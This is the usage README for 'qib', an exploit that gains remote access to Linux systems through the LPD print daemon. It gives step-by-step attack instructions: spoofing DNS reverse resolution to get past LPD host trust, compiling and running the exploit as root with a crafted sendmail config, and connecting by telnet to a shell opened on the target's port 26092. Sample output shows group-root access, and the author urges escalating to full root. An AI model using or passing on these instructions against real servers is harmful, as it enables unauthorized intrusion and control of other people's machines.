QIB- Quadruple Inverted Backflip
     Remote access through Linux LPD.

Here's how to use this thing:

1. Get line printer access to an lpd print server. While you're at it, get
   the name of the printer. It's usually something like 'lp0'.
   If you know that there's an lpd configured with a printer, and you know the
   printer name, but you aren't in the 'hosts.equiv' file, and aren't allowed
   to print, then you can still get access if you monkey with your own DNS
   reverse resolution to claim that your IP address resolves to the same 
   fully qualified host name as the lpd server. LPD always trusts machines that
   have the same name as the server it's running on :P

2. Now that you've figured out where you're coming from and where you're
   attacking, compile the qib.c with "gcc -o qib qib.c".

3. Now su to root on your attacking machine, since 'qib' needs to bind to a 
   low port (between 512 and 1024).

4. Run qib with the appropriate command line:
	bash# ./qib <local ip to use> <host to attack> <printer name> <sendmail cfgfile> <csh script to run>

   I packaged a sample 'poopmail.cf' to use as the sendmail cfg file, and
a
   'dffunkyscript' to use as the csh script to run. 

	So something like: ./qib 10.0.0.50 10.0.0.69 lp0 poopmail.cf
dffunkyscript

5. dffunkyscript creates a shell on port 26092 of the target machine. So
   telnet to it, and you get:

   bash# telnet 10.0.0.69 26092
   Trying 10.0.0.69...
   Connected to 10.0.0.69.
   Escape character is '^]'.
   bash$ cat /etc/issue
   cat /etc/issue

   Red Hat Linux release 6.0 (Hedwig)
   Kernel 2.3.25 on an i686

   bash$
   bash$ id
   id
   uid=1(bin) gid=0(root) groups=0(root)
   bash$
   bash$

6. Now your uid=1 and you're group root. If you can't figure out how to get
   uid=0 from this, you're a retard.


yeah, and the dffunkyscript thing is quick hack piece of crap. That's why the output is a bit messed up. But it's enough.
